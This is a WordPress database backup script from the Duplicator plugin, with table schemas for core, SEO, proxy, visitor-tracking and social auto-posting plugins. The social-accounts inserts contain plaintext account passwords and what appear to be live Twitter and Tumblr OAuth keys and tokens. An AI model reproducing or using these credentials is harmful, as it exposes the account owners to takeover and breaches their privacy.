/* DUPLICATOR MYSQL SCRIPT CREATED ON : 2015-02-08 16:17:28 */

SET FOREIGN_KEY_CHECKS = 0;

CREATE TABLE `wp_commentmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext,
  PRIMARY KEY (`meta_id`),
  KEY `comment_id` (`comment_id`),
  KEY `meta_key` (`meta_key`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

CREATE TABLE `wp_comments` (
  `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT '0',
  `comment_author` tinytext NOT NULL,
  `comment_author_email` varchar(100) NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT '0',
  `comment_approved` varchar(20) NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) NOT NULL DEFAULT '',
  `comment_type` varchar(20) NOT NULL DEFAULT '',
  `comment_parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `user_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`comment_ID`),
  KEY `comment_post_ID` (`comment_post_ID`),
  KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  KEY `comment_date_gmt` (`comment_date_gmt`),
  KEY `comment_parent` (`comment_parent`),
  KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;

CREATE TABLE `wp_dashnex_bogus_node` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `content_keyword_node_id` int(11) DEFAULT NULL,
  `label` varchar(255) COLLATE utf8_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `UNIQ_8DE29F60C878A4AE` (`content_keyword_node_id`),
  CONSTRAINT `FK_8DE29F60C878A4AE` FOREIGN KEY (`content_keyword_node_id`) REFERENCES `wp_dashnex_content_keyword_node` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

CREATE TABLE `wp_dashnex_category_keyword_node` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `parent_category_keyword_node_id` int(11) DEFAULT NULL,
  `keyword` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
  `wp_category_id` int(11) DEFAULT NULL,
  `wp_page_id` int(11) DEFAULT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `UNIQ_8C83B4085A93713B` (`keyword`),
  KEY `IDX_8C83B408EE73E8BB` (`parent_category_keyword_node_id`),
  CONSTRAINT `FK_8C83B408EE73E8BB` FOREIGN KEY (`parent_category_keyword_node_id`) REFERENCES `wp_dashnex_category_keyword_node` (`id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

CREATE TABLE `wp_dashnex_content_keyword_node` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `category_keyword_node_id` int(11) DEFAULT NULL,
  `keyword` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
  `wp_post_id` int(11) DEFAULT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `UNIQ_758A48915A93713B` (`keyword`),
  KEY `IDX_758A4891112505CB` (`category_keyword_node_id`),
  CONSTRAINT `FK_758A4891112505CB` FOREIGN KEY (`category_keyword_node_id`) REFERENCES `wp_dashnex_category_keyword_node` (`id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

CREATE TABLE `wp_dashnex_google_keyword` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `group_id` int(11) DEFAULT NULL,
  `name` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
  `trafficVolume` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
  `costPerClick` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
  `competitionStrength` int(11) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `IDX_3B32384AFE54D947` (`group_id`),
  CONSTRAINT `FK_3B32384AFE54D947` FOREIGN KEY (`group_id`) REFERENCES `wp_dashnex_google_keyword_group` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

CREATE TABLE `wp_dashnex_google_keyword_group` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
  `competitionStrength` int(11) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

CREATE TABLE `wp_dashnex_indicator` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `indicator_id` varchar(64) COLLATE utf8_unicode_ci NOT NULL,
  `caller_type` varchar(64) COLLATE utf8_unicode_ci NOT NULL,
  `caller_id` int(11) DEFAULT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `dnc_caller_indicator` (`indicator_id`,`caller_type`,`caller_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

CREATE TABLE `wp_dashnex_license` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `code` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
  `valid_until` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

CREATE TABLE `wp_dashnex_proxy` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `ip` varchar(16) COLLATE utf8_unicode_ci NOT NULL,
  `port` int(11) NOT NULL,
  `username` varchar(64) COLLATE utf8_unicode_ci NOT NULL,
  `password` varchar(64) COLLATE utf8_unicode_ci NOT NULL,
  `active` tinyint(1) NOT NULL,
  `last_used` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

CREATE TABLE `wp_dashnex_proxy_block` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `proxy_id` int(11) DEFAULT NULL,
  `service_id` varchar(255) COLLATE utf8_unicode_ci NOT NULL,
  `created_at` datetime NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `dnc_proxy_service_block` (`proxy_id`,`service_id`),
  KEY `IDX_687041C7DB26A4E` (`proxy_id`),
  CONSTRAINT `FK_687041C7DB26A4E` FOREIGN KEY (`proxy_id`) REFERENCES `wp_dashnex_proxy` (`id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

CREATE TABLE `wp_duplicator_packages` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(250) COLLATE utf8_unicode_ci NOT NULL,
  `hash` varchar(50) COLLATE utf8_unicode_ci NOT NULL,
  `status` int(11) NOT NULL,
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `owner` varchar(60) COLLATE utf8_unicode_ci NOT NULL,
  `package` mediumblob NOT NULL,
  PRIMARY KEY (`id`),
  KEY `hash` (`hash`)
) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

CREATE TABLE `wp_links` (
  `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `link_url` varchar(255) NOT NULL DEFAULT '',
  `link_name` varchar(255) NOT NULL DEFAULT '',
  `link_image` varchar(255) NOT NULL DEFAULT '',
  `link_target` varchar(25) NOT NULL DEFAULT '',
  `link_description` varchar(255) NOT NULL DEFAULT '',
  `link_visible` varchar(20) NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) unsigned NOT NULL DEFAULT '1',
  `link_rating` int(11) NOT NULL DEFAULT '0',
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) NOT NULL DEFAULT '',
  `link_notes` mediumtext NOT NULL,
  `link_rss` varchar(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`link_id`),
  KEY `link_visible` (`link_visible`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

CREATE TABLE `wp_maxv_social_accounts` (
  `id` varchar(15) NOT NULL,
  `name` varchar(100) NOT NULL,
  `type` varchar(30) NOT NULL,
  `last_posted_time` bigint(20) NOT NULL,
  `next_scheduled_time` bigint(20) NOT NULL,
  `max_posts` int(11) NOT NULL DEFAULT '1',
  `max_posts_hours` int(11) NOT NULL DEFAULT '8',
  `auto_share` enum('true','false') NOT NULL DEFAULT 'true',
  `shared_account` enum('true','false') NOT NULL DEFAULT 'false',
  `settings` longtext NOT NULL,
  `max_posts_ext` int(11) NOT NULL DEFAULT '1',
  `max_posts_hours_ext` int(11) NOT NULL DEFAULT '24',
  `auto_share_ext` enum('true','false') NOT NULL DEFAULT 'false',
  `last_posted_time_ext` bigint(20) NOT NULL DEFAULT '0',
  `next_scheduled_time_ext` bigint(20) NOT NULL DEFAULT '0',
  `second_tire` enum('true','false') NOT NULL DEFAULT 'false',
  `next_scheduled_time_2nd` bigint(20) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

CREATE TABLE `wp_maxv_social_accounts_log` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `time` bigint(20) NOT NULL,
  `displaytime` datetime NOT NULL,
  `accountid` varchar(15) NOT NULL,
  `postid` bigint(20) NOT NULL,
  `status` enum('Error','Success') NOT NULL,
  `post_url` varchar(250) NOT NULL,
  `message` longtext NOT NULL,
  `second_tire_id` bigint(20) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=14 DEFAULT CHARSET=utf8;

CREATE TABLE `wp_onpageseo_profiles` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `blog_id` int(11) NOT NULL DEFAULT '0',
  `keyword` tinytext COLLATE utf8_unicode_ci NOT NULL,
  `gdata` longtext COLLATE utf8_unicode_ci NOT NULL,
  `profile` longtext COLLATE utf8_unicode_ci NOT NULL,
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`id`),
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

CREATE TABLE `wp_onpageseo_urls` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `blog_id` int(11) NOT NULL DEFAULT '0',
  `name` tinytext COLLATE utf8_unicode_ci NOT NULL,
  `url` tinytext COLLATE utf8_unicode_ci NOT NULL,
  `score` longtext COLLATE utf8_unicode_ci NOT NULL,
  `report` longtext COLLATE utf8_unicode_ci NOT NULL,
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`id`),
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

CREATE TABLE `wp_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(64) NOT NULL DEFAULT '',
  `option_value` longtext NOT NULL,
  `autoload` varchar(20) NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`)
) ENGINE=InnoDB AUTO_INCREMENT=895 DEFAULT CHARSET=utf8;

CREATE TABLE `wp_p1cm_authority_reports` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `report` text COLLATE utf8_unicode_ci NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

CREATE TABLE `wp_postmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext,
  PRIMARY KEY (`meta_id`),
  KEY `post_id` (`post_id`),
  KEY `meta_key` (`meta_key`)
) ENGINE=InnoDB AUTO_INCREMENT=233 DEFAULT CHARSET=utf8;

CREATE TABLE `wp_posts` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_author` bigint(20) unsigned NOT NULL DEFAULT '0',
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext NOT NULL,
  `post_title` text NOT NULL,
  `post_excerpt` text NOT NULL,
  `post_status` varchar(20) NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) NOT NULL DEFAULT 'open',
  `post_password` varchar(20) NOT NULL DEFAULT '',
  `post_name` varchar(200) NOT NULL DEFAULT '',
  `to_ping` text NOT NULL,
  `pinged` text NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext NOT NULL,
  `post_parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `guid` varchar(255) NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT '0',
  `post_type` varchar(20) NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT '0',
  PRIMARY KEY (`ID`),
  KEY `post_name` (`post_name`),
  KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  KEY `post_parent` (`post_parent`),
  KEY `post_author` (`post_author`)
) ENGINE=InnoDB AUTO_INCREMENT=131 DEFAULT CHARSET=utf8;

CREATE TABLE `wp_term_relationships` (
  `object_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `term_order` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

CREATE TABLE `wp_term_taxonomy` (
  `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `taxonomy` varchar(32) NOT NULL DEFAULT '',
  `description` longtext NOT NULL,
  `parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `count` bigint(20) NOT NULL DEFAULT '0',
  PRIMARY KEY (`term_taxonomy_id`),
  UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  KEY `taxonomy` (`taxonomy`)
) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8;

CREATE TABLE `wp_terms` (
  `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) NOT NULL DEFAULT '',
  `slug` varchar(200) NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT '0',
  PRIMARY KEY (`term_id`),
  KEY `name` (`name`),
  KEY `slug` (`slug`)
) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8;

CREATE TABLE `wp_usermeta` (
  `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext,
  PRIMARY KEY (`umeta_id`),
  KEY `user_id` (`user_id`),
  KEY `meta_key` (`meta_key`)
) ENGINE=InnoDB AUTO_INCREMENT=28 DEFAULT CHARSET=utf8;

CREATE TABLE `wp_users` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_login` varchar(60) NOT NULL DEFAULT '',
  `user_pass` varchar(64) NOT NULL DEFAULT '',
  `user_nicename` varchar(50) NOT NULL DEFAULT '',
  `user_email` varchar(100) NOT NULL DEFAULT '',
  `user_url` varchar(100) NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(60) NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT '0',
  `display_name` varchar(250) NOT NULL DEFAULT '',
  PRIMARY KEY (`ID`),
  KEY `user_login_key` (`user_login`),
  KEY `user_nicename` (`user_nicename`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;

CREATE TABLE `wp_viberspy` (
  `id` int(99) NOT NULL AUTO_INCREMENT,
  `user_id` varchar(200) COLLATE utf8_unicode_ci NOT NULL DEFAULT '',
  `session_id` varchar(200) COLLATE utf8_unicode_ci NOT NULL DEFAULT '',
  `session_spydata` text COLLATE utf8_unicode_ci,
  `session_start` int(9) NOT NULL,
  `session_end` int(9) NOT NULL,
  `session_time` int(9) NOT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

CREATE TABLE `wp_viberspy_clicks` (
  `id` int(99) NOT NULL AUTO_INCREMENT,
  `date` date NOT NULL,
  `page_url` varchar(500) COLLATE utf8_unicode_ci NOT NULL DEFAULT '',
  `click_data` text COLLATE utf8_unicode_ci,
  UNIQUE KEY `id` (`id`),
  KEY `page_url` (`page_url`(333)),
  KEY `date` (`date`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

CREATE TABLE `wp_viberspy_mmove` (
  `id` int(99) NOT NULL AUTO_INCREMENT,
  `date` date NOT NULL,
  `page_url` varchar(500) COLLATE utf8_unicode_ci NOT NULL DEFAULT '',
  `mmove_data` text COLLATE utf8_unicode_ci,
  UNIQUE KEY `id` (`id`),
  KEY `page_url` (`page_url`(333)),
  KEY `date` (`date`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

CREATE TABLE `wp_viberspy_popular` (
  `id` int(99) NOT NULL AUTO_INCREMENT,
  `page_url` varchar(500) COLLATE utf8_unicode_ci NOT NULL DEFAULT '',
  `points` int(99) NOT NULL,
  UNIQUE KEY `id` (`id`),
  KEY `page_url` (`page_url`(333))
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

CREATE TABLE `wp_viberspy_scroll` (
  `id` int(99) NOT NULL AUTO_INCREMENT,
  `date` date NOT NULL,
  `page_url` varchar(500) COLLATE utf8_unicode_ci NOT NULL DEFAULT '',
  `scroll_data` text COLLATE utf8_unicode_ci,
  UNIQUE KEY `id` (`id`),
  KEY `page_url` (`page_url`(333)),
  KEY `date` (`date`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;


/* INSERT TABLE DATA: wp_dashnex_license */
INSERT INTO `wp_dashnex_license` VALUES("1", "p1cm", "2015-02-14 02:36:30");

/* INSERT TABLE DATA: wp_duplicator_packages */
INSERT INTO `wp_duplicator_packages` VALUES("6", "20150203_mobilemechanicstallahasseefl", "54d78ac05c5471857150208161144", "20", "2015-02-08 16:17:28", "admin207", "O:11:\"DUP_Package\":16:{s:2:\"ID\";i:6;s:4:\"Name\";s:37:\"20150203_mobilemechanicstallahasseefl\";s:4:\"Hash\";s:29:\"54d78ac05c5471857150208161144\";s:8:\"NameHash\";s:67:\"20150203_mobilemechanicstallahasseefl_54d78ac05c5471857150208161144\";s:7:\"Version\";s:6:\"0.5.12\";s:4:\"Type\";i:0;s:5:\"Notes\";s:0:\"\";s:9:\"StorePath\";s:51:\"/home/themobilemech207/public_html/wp-snapshots/tmp\";s:8:\"StoreURL\";s:55:\"http://tallahassee.themobilemechanics.org/wp-snapshots/\";s:8:\"ScanFile\";s:77:\"20150203_mobilemechanicstallahasseefl_54d78ac05c5471857150208161144_scan.json\";s:7:\"Runtime\";N;s:7:\"ExeSize\";N;s:7:\"ZipSize\";N;s:7:\"Archive\";O:11:\"DUP_Archive\":17:{s:10:\"FilterDirs\";s:0:\"\";s:10:\"FilterExts\";s:0:\"\";s:8:\"FilterOn\";i:0;s:4:\"File\";s:79:\"20150203_mobilemechanicstallahasseefl_54d78ac05c5471857150208161144_archive.zip\";s:6:\"Format\";s:3:\"ZIP\";s:7:\"PackDir\";s:34:\"/home/themobilemech207/public_html\";s:4:\"Size\";i:0;s:12:\"WarnFileSize\";a:0:{}s:12:\"WarnFileName\";a:0:{}s:4:\"Dirs\";a:0:{}s:5:\"Files\";a:0:{}s:5:\"Links\";a:0:{}s:8:\"OmitDirs\";a:0:{}s:9:\"OmitFiles\";a:0:{}s:10:\"\0*\0Package\";O:11:\"DUP_Package\":16:{s:2:\"ID\";N;s:4:\"Name\";s:37:\"20150203_mobilemechanicstallahasseefl\";s:4:\"Hash\";s:29:\"54d78ac05c5471857150208161144\";s:8:\"NameHash\";s:67:\"20150203_mobilemechanicstallahasseefl_54d78ac05c5471857150208161144\";s:7:\"Version\";s:6:\"0.5.12\";s:4:\"Type\";i:0;s:5:\"Notes\";s:0:\"\";s:9:\"StorePath\";s:51:\"/home/themobilemech207/public_html/wp-snapshots/tmp\";s:8:\"StoreURL\";s:55:\"http://tallahassee.themobilemechanics.org/wp-snapshots/\";s:8:\"ScanFile\";N;s:7:\"Runtime\";N;s:7:\"ExeSize\";N;s:7:\"ZipSize\";N;s:7:\"Archive\";r:15;s:9:\"Installer\";O:13:\"DUP_Installer\":11:{s:4:\"File\";s:81:\"20150203_mobilemechanicstallahasseefl_54d78ac05c5471857150208161144_installer.php\";s:4:\"Size\";i:0;s:10:\"OptsDBHost\";s:0:\"\";s:10:\"OptsDBName\";s:0:\"\";s:10:\"OptsDBUser\";s:0:\"\";s:12:\"OptsSSLAdmin\";i:0;s:12:\"OptsSSLLogin\";i:0;s:11:\"OptsCacheWP\";i:0;s:13:\"OptsCachePath\";i:0;s:10:\"OptsURLNew\";s:0:\"\";s:10:\"\0*\0Package\";r:30;}s:8:\"Database\";O:12:\"DUP_Database\":11:{s:4:\"Type\";s:5:\"MySQL\";s:4:\"Size\";N;s:4:\"File\";s:80:\"20150203_mobilemechanicstallahasseefl_54d78ac05c5471857150208161144_database.sql\";s:4:\"Path\";N;s:12:\"FilterTables\";s:0:\"\";s:8:\"FilterOn\";i:0;s:4:\"Name\";N;s:10:\"\0*\0Package\";r:1;s:25:\"\0DUP_Database\0dbStorePath\";N;s:23:\"\0DUP_Database\0EOFMarker\";s:0:\"\";s:26:\"\0DUP_Database\0networkFlush\";b:0;}}s:28:\"\0DUP_Archive\0filterDirsArray\";a:0:{}s:28:\"\0DUP_Archive\0filterExtsArray\";a:0:{}}s:9:\"Installer\";r:45;s:8:\"Database\";r:57;}");

/* INSERT TABLE DATA: wp_maxv_social_accounts */
INSERT INTO `wp_maxv_social_accounts` VALUES("54d179b71e6b4", "Mike Alan", "wordpress", "0", "1423384040", "1", "24", "true", "", "{\"login\":\"support@easyabc.info\",\"pass\":\"36123612A@a\",\"url\":\"http:\\/\\/supportsite21.wordpress.com\",\"title_format\":\"%title%\",\"content_format\":\"%excerpt%\\n\\n<a href=\\\"%url%\\\">Read more...<\\/a>\",\"share_category\":\"\",\"NSFW\":\"false\",\"attach_image\":\"\",\"use_rss_feeds\":\"\",\"spin_content\":\"\",\"videos_enabled\":\"\",\"images_enabled\":\"\",\"token\":\"\",\"consumer_key\":\"\",\"consumer_secret\":\"\",\"page_id\":\"\"}", "1", "24", "false", "0", "0", "false", "0");
INSERT INTO `wp_maxv_social_accounts` VALUES("54d179b71d2a7", "Mike Alan", "twitter", "0", "1423419579", "1", "24", "true", "", "{\"consumer_key\":\"2opOHo5c8FhHJsOfjF0h22OCj\",\"consumer_secret\":\"tTKdNZxISPvOmTiCSq2oVGBKjEH4hM6z4ztcBmcyWpksxXAnvE\",\"token\":\"2942233849-fprQuQ4rbykICN8xoEx7CpkQeQ6od4e6aGDJ3uL\",\"token_secret\":\"SmR7rbWn98JLYjkVR07ItryaqELff4cThumaQDiSjp8kS\",\"login\":\"undefined\",\"pass\":\"undefined\",\"url\":\"https:\\/\\/twitter.com\\/supporteasyabc\",\"title_format\":\"\",\"content_format\":\"%title% - %url%\",\"share_category\":\"\",\"NSFW\":\"false\",\"attach_image\":\"true\",\"use_rss_feeds\":\"\",\"spin_content\":\"\",\"videos_enabled\":\"\",\"images_enabled\":\"\",\"page_id\":\"\"}", "1", "24", "false", "0", "0", "false", "0");
INSERT INTO `wp_maxv_social_accounts` VALUES("54d179b71bce4", "Mike Alan", "tumblr", "0", "1423430051", "1", "24", "true", "", "{\"consumer_key\":\"guc3xpLi6idkOrA7GKFEgtsmLYizn01Drrbo50H0wgMzsdsuGB\",\"consumer_secret\":\"wCpwxVuiRocJZcYXa20ess1JwkfWRN5pBL7eJvdJS5dcZWd0S3\",\"token\":\"MNUd4XdRYE3hDQYnfAle2rkuZx0dNSPR6DpAnn04LngH2cFHYf\",\"token_secret\":\"P0gedaXvgPlbQgp2FT5kK3j5UJZxoe18HiEDxVvpEOnmFjoiQf\",\"oauth_verifier\":\"wZrfcdUN595bdkVRX0ynxYW4PAkuFZoXEYJIDGkj1ytpFEIDZm\",\"login\":\"undefined\",\"pass\":\"undefined\",\"url\":\"http:\\/\\/supporteasyabc.tumblr.com\\/\",\"title_format\":\"%title%\",\"content_format\":\"%excerpt%\\n\\nRead more at %url%\",\"share_category\":\"\",\"NSFW\":\"false\",\"attach_image\":\"\",\"use_rss_feeds\":\"\",\"spin_content\":\"\",\"videos_enabled\":\"\",\"images_enabled\":\"\",\"page_id\":\"\"}", "1", "24", "false", "0", "0", "false", "0");
INSERT INTO `wp_maxv_social_accounts` VALUES("54d179b71af86", "Mike Alan", "stumbleupon", "0", "1423413118", "1", "24", "true", "", "{\"login\":\"support@easyabc.info\",\"pass\":\"36123612\",\"page_id\":\"Home Business\",\"title_format\":\"\",\"content_format\":\"%excerpt%\",\"share_category\":\"\",\"NSFW\":\"true\",\"attach_image\":\"\",\"use_rss_feeds\":\"\",\"spin_content\":\"\",\"videos_enabled\":\"\",\"images_enabled\":\"\",\"token\":\"\",\"consumer_key\":\"\",\"consumer_secret\":\"\",\"url\":\"\"}", "1", "24", "false", "0", "0", "false", "0");
INSERT INTO `wp_maxv_social_accounts` VALUES("54d179b719bb7", "Mike Alan", "pinterest", "0", "1423384409", "1", "24", "true", "", "{\"login\":\"support@easyabc.info\",\"pass\":\"36123612\",\"page_id\":\"545850486025334620\",\"page_name\":\"In The News\",\"title_format\":\"\",\"content_format\":\"%title% - %url%\",\"share_category\":\"\",\"NSFW\":\"false\",\"attach_image\":\"\",\"use_rss_feeds\":\"\",\"spin_content\":\"\",\"videos_enabled\":\"\",\"images_enabled\":\"\",\"token\":\"\",\"consumer_key\":\"\",\"consumer_secret\":\"\",\"url\":\"\"}", "1", "24", "false", "0", "0", "false", "0");
INSERT INTO `wp_maxv_social_accounts` VALUES("54d179b718650", "Keith Alan", "google plus", "0", "1423419387", "1", "24", "true", "", "{\"login\":\"tampabayautorepairs@gmail.com\",\"pass\":\"36123612\",\"page_id\":\"\",\"title_format\":\"\",\"content_format\":\"%title% - %url%\",\"share_category\":\"\",\"NSFW\":\"false\",\"attach_image\":\"true\",\"use_rss_feeds\":\"\",\"spin_content\":\"\",\"videos_enabled\":\"\",\"images_enabled\":\"\",\"token\":\"\",\"consumer_key\":\"\",\"consumer_secret\":\"\",\"url\":\"\"}", "1", "24", "false", "0", "0", "false", "0");
INSERT INTO `wp_maxv_social_accounts` VALUES("54d179b718f33", "Mike Alan", "instapaper", "0", "1423434072", "1", "24", "true", "", "{\"login\":\"support@easyabc.info\",\"pass\":\"36123612\",\"title_format\":\"%title%\",\"content_format\":\"%excerpt%\",\"share_category\":\"\",\"NSFW\":\"false\",\"attach_image\":\"\",\"use_rss_feeds\":\"\",\"spin_content\":\"\",\"videos_enabled\":\"\",\"images_enabled\":\"\",\"token\":\"\",\"consumer_key\":\"\",\"consumer_secret\":\"\",\"page_id\":\"\",\"url\":\"\"}", "1", "24", "false", "0", "0", "false", "0");
INSERT INTO `wp_maxv_social_accounts` VALUES("54d179b716e06", "Mike Alan", "delicious", "0", "1423397735", "1", "24", "true", "", "{\"token\":\"\",\"login\":\"supporteasyabc\",\"pass\":\"36123612\",\"app_id\":\"\",\"app_secret\":\"\",\"auth_code\":\"\",\"title_format\":\"%title%\",\"content_format\":\"%excerpt%\",\"share_category\":\"\",\"NSFW\":\"false\",\"attach_image\":\"\",\"use_rss_feeds\":\"\",\"spin_content\":\"\",\"videos_enabled\":\"\",\"images_enabled\":\"\",\"consumer_key\":\"\",\"consumer_secret\":\"\",\"page_id\":\"\",\"url\":\"\"}", "1", "24", "false", "0", "0", "false", "0");
